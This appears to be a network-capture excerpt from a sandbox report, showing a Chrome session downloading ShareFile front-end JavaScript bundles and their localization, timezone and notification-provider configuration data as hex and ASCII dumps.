                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 6c 74 65 72 20 64 75 20 63 6f 6e 74 65 6e 75 20 73 61 6e 73 20 73 65 20 63 6f 6e 6e 65 63 74 65 72 20 73 27 69 6c 20 66 6f 75 72 6e 69 74 20 75 6e 20 6e 6f 6d 20 65 74 20 75 6e 65 20 61 64 72 65 73 73 65 20 65 2d 6d 61 69 6c 2e 22 2c 76 69 65 77 5f 77 61 74 65 72 6d 61 72 6b 3a 22 51 75 69 63 6f 6e 71 75 65 20 70 65 75 74 20 63 6f 6e 73 75 6c 74 65 72 20 75 6e 65 20 63 6f 70 69 65 20 66 69 6c 69 67 72 61 6e c3 a9 65 20 73 61 6e 73 20 73 65 20 63 6f 6e 6e 65 63 74 65 72 20 73 27 69 6c 20 66 6f 75 72 6e 69 74 20 75 6e 20 6e 6f 6d 20 65 74 20 75 6e 65 20 61 64 72 65 73 73 65 20 65 2d 6d 61 69 6c 2e 22 7d 7d 2c 73 68 61 72 65 5f 72 65 71 75 65 73 74 3a 7b 65 6d 61 69 6c 3a 7b 61 6e 6f 6e 79 6d 6f 75 73 3a 22 4c 65 73 20 64 65 73 74 69 6e 61 74 61 69 72 65 73
                                                                                                                                                                                                                                                                                Data Ascii: lter du contenu sans se connecter s'il fournit un nom et une adresse e-mail.",view_watermark:"Quiconque peut consulter une copie filigrane sans se connecter s'il fournit un nom et une adresse e-mail."}},share_request:{email:{anonymous:"Les destinataires
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 69 62 75 7a 69 6f 6e 65 22 2c 65 6d 70 6c 6f 79 65 65 73 3a 22 44 69 70 65 6e 64 65 6e 74 69 22 2c 6e 61 6d 65 3a 22 4e 6f 6d 65 22 2c 6e 6f 5f 63 6f 6e 74 61 63 74 3a 22 4e 65 73 73 75 6e 20 63 6f 6e 74 61 74 74 6f 20 63 6f 72 72 69 73 70 6f 6e 64 65 20 61 6c 6c 61 20 72 69 63 65 72 63 61 22 2c 70 65 72 73 6f 6e 61 6c 3a 22 52 75 62 72 69 63 61 20 70 65 72 73 6f 6e 61 6c 65 22 2c 73 68 61 72 65 64 3a 22 52 75 62 72 69 63 61 20 63 6f 6e 64 69 76 69 73 61 22 7d 2c 63 61 6e 63 65 6c 3a 22 41 6e 6e 75 6c 6c 61 22 2c 63 61 75 74 69 6f 6e 3a 22 41 74 74 65 6e 7a 69 6f 6e 65 22 2c 63 68 65 63 6b 6f 75 74 3a 7b 61 62 6f 75 74 5f 74 6f 5f 63 68 65 63 6b 5f 6f 75 74 5f 65 78 70 69 72 65 5f 6d 65 73 73 61 67 65 3a 22 49 6c 20 66 69 6c 65 20 65 73 74 72 61 74 74 6f
                                                                                                                                                                                                                                                                                Data Ascii: ibuzione",employees:"Dipendenti",name:"Nome",no_contact:"Nessun contatto corrisponde alla ricerca",personal:"Rubrica personale",shared:"Rubrica condivisa"},cancel:"Annulla",caution:"Attenzione",checkout:{about_to_check_out_expire_message:"Il file estratto
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 20 65 66 66 65 74 74 75 61 74 6f 20 6c 27 61 63 63 65 73 73 6f 2e 22 2c 76 69 65 77 5f 77 61 74 65 72 6d 61 72 6b 3a 22 47 6c 69 20 75 74 65 6e 74 69 20 64 6f 74 61 74 69 20 64 69 20 71 75 65 73 74 6f 20 63 6f 6c 6c 65 67 61 6d 65 6e 74 6f 20 70 6f 73 73 6f 6e 6f 20 76 69 73 75 61 6c 69 7a 7a 61 72 65 20 6f 6e 6c 69 6e 65 20 63 6f 6e 20 75 6e 61 20 66 69 6c 69 67 72 61 6e 61 20 64 6f 70 6f 20 61 76 65 72 20 65 66 66 65 74 74 75 61 74 6f 20 6c 27 61 63 63 65 73 73 6f 2e 22 7d 2c 65 6d 70 6c 6f 79 65 65 5f 6f 6e 6c 79 3a 7b 76 69 65 77 5f 64 6f 77 6e 6c 6f 61 64 3a 22 49 20 64 69 70 65 6e 64 65 6e 74 69 20 64 6f 74 61 74 69 20 64 69 20 71 75 65 73 74 6f 20 63 6f 6c 6c 65 67 61 6d 65 6e 74 6f 20 70 6f 73 73 6f 6e 6f 20 76 69 73 75 61 6c 69 7a 7a 61 72 65 20
                                                                                                                                                                                                                                                                                Data Ascii: effettuato l'accesso.",view_watermark:"Gli utenti dotati di questo collegamento possono visualizzare online con una filigrana dopo aver effettuato l'accesso."},employee_only:{view_download:"I dipendenti dotati di questo collegamento possono visualizzare


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                102192.168.2.64982913.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC425OUTGET /sharefile-web/sharefiledev-notification-center/0.58.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 458835
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Thu, 01 Aug 2024 17:12:16 GMT
                                                                                                                                                                                                                                                                                ETag: "735cba16bf1442c21b8fa8e78aa8e83a"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 cdcb559c2f25d8ad2ccf0419bee33b02.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: qv21Ed6tT_SgA-BNQ3jY8kVqzOmjuaU6fLbeS7i9yV-3pcUj2ni1Wg==
                                                                                                                                                                                                                                                                                Age: 45977
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 6e 6f 74 69 66 69 63 61 74 69 6f 6e 63 65 6e 74 65 72 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 73 3d 7b 7d 2c 61 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevnotificationcenter,{})System.register(["@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},s={},a={},c={};return Object.definePro
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 6c 65 6e 67 74 68 3c 32 3f 65 3a 74 2e 70 61 74 68 6e 61 6d 65 28 22 22 29 2e 71 75 65 72 79 28 22 22 29 2e 68 61 73 68 28 22 22 29 2e 73 65 67 6d 65 6e 74 28 6e 2e 73 6c 69 63 65 28 30 2c 32 29 29 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 2f 22 7d 7d 2c 37 31 39 32 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 45 6e 73 53 75 62 73 63 72 69 70 74 69 6f 6e 52 65 71 75 65 73 74 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 45 6e 73 53 75 62 73 63 72
                                                                                                                                                                                                                                                                                Data Ascii: length<2?e:t.pathname("").query("").hash("").segment(n.slice(0,2)).toString()+"/"}},7192:(e,t,n)=>{"use strict";function r(e){return e&&"ShareFile.Api.Models.EnsSubscriptionRequest"===e["odata.type"]}function i(e){return e&&"ShareFile.Api.Models.EnsSubscr
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC8806INData Raw: 74 3d 31 35 34 30 34 38 33 34 37 37 2a 28 36 35 35 33 35 26 28 74 3d 32 35 35 26 65 2e 63 68 61 72 43 6f 64 65 41 74 28 72 29 7c 28 32 35 35 26 65 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 72 29 29 3c 3c 38 7c 28 32 35 35 26 65 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 72 29 29 3c 3c 31 36 7c 28 32 35 35 26 65 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 72 29 29 3c 3c 32 34 29 29 2b 28 35 39 37 39 37 2a 28 74 3e 3e 3e 31 36 29 3c 3c 31 36 29 2c 6e 3d 31 35 34 30 34 38 33 34 37 37 2a 28 36 35 35 33 35 26 28 74 5e 3d 74 3e 3e 3e 32 34 29 29 2b 28 35 39 37 39 37 2a 28 74 3e 3e 3e 31 36 29 3c 3c 31 36 29 5e 31 35 34 30 34 38 33 34 37 37 2a 28 36 35 35 33 35 26 6e 29 2b 28 35 39 37 39 37 2a 28 6e 3e 3e 3e 31 36 29 3c 3c 31 36 29 3b 73 77 69 74 63 68 28 69 29 7b
                                                                                                                                                                                                                                                                                Data Ascii: t=1540483477*(65535&(t=255&e.charCodeAt(r)|(255&e.charCodeAt(++r))<<8|(255&e.charCodeAt(++r))<<16|(255&e.charCodeAt(++r))<<24))+(59797*(t>>>16)<<16),n=1540483477*(65535&(t^=t>>>24))+(59797*(t>>>16)<<16)^1540483477*(65535&n)+(59797*(n>>>16)<<16);switch(i){
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 74 68 65 6e 28 73 2c 61 29 7d 63 28 28 72 3d 72 2e 61 70 70 6c 79 28 65 2c 74 7c 7c 5b 5d 29 29 2e 6e 65 78 74 28 29 29 7d 29 29 7d 2c 6f 3d 75 6e 64 65 66 69 6e 65 64 26 26 75 6e 64 65 66 69 6e 65 64 2e 5f 5f 72 65 73 74 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 65 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 72 29 26 26 74 2e 69 6e 64 65 78 4f 66 28 72 29 3c 30 26 26 28 6e 5b 72 5d 3d 65 5b 72 5d 29 3b 69 66 28 6e 75 6c 6c 21 3d 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 69 3d 30 3b 66
                                                                                                                                                                                                                                                                                Data Ascii: then(s,a)}c((r=r.apply(e,t||[])).next())}))},o=undefined&&undefined.__rest||function(e,t){var n={};for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&t.indexOf(r)<0&&(n[r]=e[r]);if(null!=e&&"function"==typeof Object.getOwnPropertySymbols){var i=0;f
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 54 49 4f 4e 53 5f 51 55 45 52 59 5f 4b 45 59 2c 7b 65 78 61 63 74 3a 21 31 7d 29 7d 7d 2c 6c 69 73 74 65 6e 65 72 3a 74 3d 3e 74 68 69 73 2e 63 61 6c 6c 55 70 64 61 74 65 4c 69 73 74 65 6e 65 72 28 74 2c 65 29 7d 29 3b 72 2e 6d 75 74 61 74 65 28 7b 66 65 65 64 49 64 3a 69 7d 29 2e 74 68 65 6e 28 28 65 3d 3e 28 6e 75 6c 6c 3d 3d 74 7c 7c 74 28 65 29 2c 65 29 29 29 5b 22 63 61 74 63 68 22 5d 28 28 65 3d 3e 7b 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 65 29 7d 29 29 5b 22 66 69 6e 61 6c 6c 79 22 5d 28 28 28 29 3d 3e 7b 6f 28 29 7d 29 29 7d 29 29 7d 72 65 6d 6f 76 65 41 6c 6c 4e 6f 74 69 66 69 63 61 74 69 6f 6e 73 28 7b 66 65 65 64 49 64 3a 65 2c 6c 69 73 74 65 6e 65 72 3a 74 2c 6f 6e 53 75 63 63 65 73 73 3a 6e 2c 6f 6e 45 72 72 6f 72 3a 69 7d 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                Data Ascii: TIONS_QUERY_KEY,{exact:!1})}},listener:t=>this.callUpdateListener(t,e)});r.mutate({feedId:i}).then((e=>(null==t||t(e),e)))["catch"]((e=>{null==n||n(e)}))["finally"]((()=>{o()}))}))}removeAllNotifications({feedId:e,listener:t,onSuccess:n,onError:i}){return
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 54 49 4e 41 5f 53 41 4c 54 41 3d 22 41 6d 65 72 69 63 61 2f 41 72 67 65 6e 74 69 6e 61 2f 53 61 6c 74 61 22 2c 65 2e 41 4d 45 52 49 43 41 5f 41 52 47 45 4e 54 49 4e 41 5f 53 41 4e 5f 4a 55 41 4e 3d 22 41 6d 65 72 69 63 61 2f 41 72 67 65 6e 74 69 6e 61 2f 53 61 6e 5f 4a 75 61 6e 22 2c 65 2e 41 4d 45 52 49 43 41 5f 41 52 47 45 4e 54 49 4e 41 5f 53 41 4e 5f 4c 55 49 53 3d 22 41 6d 65 72 69 63 61 2f 41 72 67 65 6e 74 69 6e 61 2f 53 61 6e 5f 4c 75 69 73 22 2c 65 2e 41 4d 45 52 49 43 41 5f 41 52 47 45 4e 54 49 4e 41 5f 54 55 43 55 4d 41 4e 3d 22 41 6d 65 72 69 63 61 2f 41 72 67 65 6e 74 69 6e 61 2f 54 75 63 75 6d 61 6e 22 2c 65 2e 41 4d 45 52 49 43 41 5f 41 52 47 45 4e 54 49 4e 41 5f 55 53 48 55 41 49 41 3d 22 41 6d 65 72 69 63 61 2f 41 72 67 65 6e 74 69 6e 61
                                                                                                                                                                                                                                                                                Data Ascii: TINA_SALTA="America/Argentina/Salta",e.AMERICA_ARGENTINA_SAN_JUAN="America/Argentina/San_Juan",e.AMERICA_ARGENTINA_SAN_LUIS="America/Argentina/San_Luis",e.AMERICA_ARGENTINA_TUCUMAN="America/Argentina/Tucuman",e.AMERICA_ARGENTINA_USHUAIA="America/Argentina
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 69 66 69 63 2f 47 61 6d 62 69 65 72 22 2c 65 2e 50 41 43 49 46 49 43 5f 47 55 41 44 41 4c 43 41 4e 41 4c 3d 22 50 61 63 69 66 69 63 2f 47 75 61 64 61 6c 63 61 6e 61 6c 22 2c 65 2e 50 41 43 49 46 49 43 5f 47 55 41 4d 3d 22 50 61 63 69 66 69 63 2f 47 75 61 6d 22 2c 65 2e 50 41 43 49 46 49 43 5f 48 4f 4e 4f 4c 55 4c 55 3d 22 50 61 63 69 66 69 63 2f 48 6f 6e 6f 6c 75 6c 75 22 2c 65 2e 50 41 43 49 46 49 43 5f 4a 4f 48 4e 53 54 4f 4e 3d 22 50 61 63 69 66 69 63 2f 4a 6f 68 6e 73 74 6f 6e 22 2c 65 2e 50 41 43 49 46 49 43 5f 4b 49 52 49 54 49 4d 41 54 49 3d 22 50 61 63 69 66 69 63 2f 4b 69 72 69 74 69 6d 61 74 69 22 2c 65 2e 50 41 43 49 46 49 43 5f 4b 4f 53 52 41 45 3d 22 50 61 63 69 66 69 63 2f 4b 6f 73 72 61 65 22 2c 65 2e 50 41 43 49 46 49 43 5f 4b 57 41 4a 41
                                                                                                                                                                                                                                                                                Data Ascii: ific/Gambier",e.PACIFIC_GUADALCANAL="Pacific/Guadalcanal",e.PACIFIC_GUAM="Pacific/Guam",e.PACIFIC_HONOLULU="Pacific/Honolulu",e.PACIFIC_JOHNSTON="Pacific/Johnston",e.PACIFIC_KIRITIMATI="Pacific/Kiritimati",e.PACIFIC_KOSRAE="Pacific/Kosrae",e.PACIFIC_KWAJA
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 70 6c 61 79 4e 61 6d 65 3a 22 41 6c 65 72 74 20 55 49 44 22 2c 74 79 70 65 3a 22 73 74 72 69 6e 67 22 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 22 61 20 75 6e 69 71 75 65 20 61 6c 65 72 74 20 49 44 20 66 6f 72 20 67 72 6f 75 70 69 6e 67 2c 20 6d 61 70 73 20 74 6f 20 61 6c 65 72 74 5f 75 69 64 20 6f 66 20 67 72 61 66 61 6e 61 20 77 65 62 68 6f 6f 6b 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 22 2c 72 65 71 75 69 72 65 64 3a 21 31 7d 2c 7b 6b 65 79 3a 50 65 2e 74 69 74 6c 65 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 54 69 74 6c 65 2e 22 2c 74 79 70 65 3a 22 73 74 72 69 6e 67 22 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 22 74 69 74 6c 65 20 66 6f 72 20 74 68 65 20 61 6c 65 72 74 22 2c 72 65 71 75 69 72 65 64 3a 21 31 7d 2c 7b 6b 65 79 3a 50 65 2e 69 6d 61 67 65 55 72
                                                                                                                                                                                                                                                                                Data Ascii: playName:"Alert UID",type:"string",description:"a unique alert ID for grouping, maps to alert_uid of grafana webhook body content",required:!1},{key:Pe.title,displayName:"Title.",type:"string",description:"title for the alert",required:!1},{key:Pe.imageUr
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC4426INData Raw: 69 64 74 68 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 42 61 6e 64 77 69 64 74 68 22 2c 63 68 61 6e 6e 65 6c 3a 45 2e 53 4d 53 2c 63 72 65 64 65 6e 74 69 61 6c 73 3a 42 74 2c 62 65 74 61 56 65 72 73 69 6f 6e 3a 21 30 2c 64 6f 63 52 65 66 65 72 65 6e 63 65 3a 22 68 74 74 70 73 3a 2f 2f 64 65 76 2e 62 61 6e 64 77 69 64 74 68 2e 63 6f 6d 2f 64 6f 63 73 2f 6d 65 73 73 61 67 69 6e 67 2f 63 72 65 61 74 65 4d 65 73 73 61 67 65 22 2c 6c 6f 67 6f 46 69 6c 65 4e 61 6d 65 3a 7b 6c 69 67 68 74 3a 22 62 61 6e 64 77 69 64 74 68 2e 70 6e 67 22 2c 64 61 72 6b 3a 22 62 61 6e 64 77 69 64 74 68 2e 70 6e 67 22 7d 7d 2c 7b 69 64 3a 55 65 2e 41 7a 75 72 65 53 6d 73 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 41 7a 75 72 65 20 53 6d 73 22 2c 63 68 61 6e 6e 65 6c 3a 45 2e 53 4d 53
                                                                                                                                                                                                                                                                                Data Ascii: idth,displayName:"Bandwidth",channel:E.SMS,credentials:Bt,betaVersion:!0,docReference:"https://dev.bandwidth.com/docs/messaging/createMessage",logoFileName:{light:"bandwidth.png",dark:"bandwidth.png"}},{id:Ue.AzureSms,displayName:"Azure Sms",channel:E.SMS
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 7b 6b 65 79 3a 64 2e 50 52 49 4d 41 52 59 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 50 72 69 6d 61 72 79 22 7d 2c 72 6e 3d 7b 6b 65 79 3a 64 2e 53 45 43 4f 4e 44 41 52 59 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 53 65 63 6f 6e 64 61 72 79 22 7d 2c 6f 6e 3d 7b 70 72 69 6d 61 72 79 3a 7b 62 61 63 6b 47 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 39 39 64 65 67 2c 23 44 44 32 34 37 36 20 30 25 20 30 25 2c 20 23 46 46 35 31 32 46 20 31 30 30 25 20 31 30 30 25 29 22 2c 66 6f 6e 74 43 6f 6c 6f 72 3a 22 23 46 46 46 46 46 46 22 2c 72 65 6d 6f 76 65 43 69 72 63 6c 65 43 6f 6c 6f 72 3a 22 77 68 69 74 65 22 7d 2c 73 65 63 6f 6e 64 61 72 79 3a 7b 62 61 63 6b 47 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 23 33 44 33 44 34 44 22 2c 66
                                                                                                                                                                                                                                                                                Data Ascii: {key:d.PRIMARY,displayName:"Primary"},rn={key:d.SECONDARY,displayName:"Secondary"},on={primary:{backGroundColor:"linear-gradient(99deg,#DD2476 0% 0%, #FF512F 100% 100%)",fontColor:"#FFFFFF",removeCircleColor:"white"},secondary:{backGroundColor:"#3D3D4D",f


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                103192.168.2.64983013.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC422OUTGET /sharefile-web/sharefiledev-publisher-pilet/0.17.11/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 188870
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 26 Aug 2024 20:27:12 GMT
                                                                                                                                                                                                                                                                                ETag: "3eb98fc30e286b34ae6a699333c2b13c"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 c3b74c81fdcb7942211a6c721efa13fc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: bC9jUI6dq1CxnSe_p1MQ3JiqXfYf9ofCGksIK18djU8u2jdFHUcezw==
                                                                                                                                                                                                                                                                                Age: 45977
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC15835INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 70 75 62 6c 69 73 68 65 72 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 72 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6e 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevpublisherpilet,{})System.register(["react","react-dom","tslib"],(function(e,t){var r={},n={},o={};return Object.defineProperty(r,"__esModule",{value:!0}),Object.defineProperty(n,"__esModule",{value:!0}),{setters:[f
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 65 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 4d 61 74 68 2e 6d 61 78 28 65 2b 28 74 7c 7c 30 29 2d 44 61 74 65 2e 6e 6f 77 28 29 2c 30 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 43 28 65 29 3f 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 3f 7b 2e 2e 2e 72 2c 71 75 65 72 79 4b 65 79 3a 65 2c 71 75 65 72 79 46 6e 3a 74 7d 3a 7b 2e 2e 2e 74 2c 71 75 65 72 79 4b 65 79 3a 65 7d 3a 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 43 28 65 29 3f 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 3f 7b 2e 2e 2e 72 2c 6d 75 74 61 74 69 6f 6e 4b 65 79 3a 65 2c 6d 75 74 61 74 69 6f 6e 46 6e 3a 74 7d 3a 7b 2e 2e 2e 74 2c 6d 75 74 61 74
                                                                                                                                                                                                                                                                                Data Ascii: e)))}function l(e,t){return Math.max(e+(t||0)-Date.now(),0)}function h(e,t,r){return C(e)?"function"==typeof t?{...r,queryKey:e,queryFn:t}:{...t,queryKey:e}:e}function f(e,t,r){return C(e)?"function"==typeof t?{...r,mutationKey:e,mutationFn:t}:{...t,mutat
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 20 69 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 73 75 70 65 72 28 29 2c 74 68 69 73 2e 63 6f 6e 66 69 67 3d 65 7c 7c 7b 7d 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 3d 5b 5d 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 49 64 3d 30 7d 62 75 69 6c 64 28 65 2c 74 2c 72 29 7b 63 6f 6e 73 74 20 6e 3d 6e 65 77 20 7a 28 7b 6d 75 74 61 74 69 6f 6e 43 61 63 68 65 3a 74 68 69 73 2c 6c 6f 67 67 65 72 3a 65 2e 67 65 74 4c 6f 67 67 65 72 28 29 2c 6d 75 74 61 74 69 6f 6e 49 64 3a 2b 2b 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 49 64 2c 6f 70 74 69 6f 6e 73 3a 65 2e 64 65 66 61 75 6c 74 4d 75 74 61 74 69 6f 6e 4f 70 74 69 6f 6e 73 28 74 29 2c 73 74 61 74 65 3a 72 2c 64 65 66 61 75 6c 74 4f 70 74 69 6f 6e 73 3a 74 2e 6d 75 74 61 74 69 6f 6e 4b 65 79 3f 65 2e 67 65 74
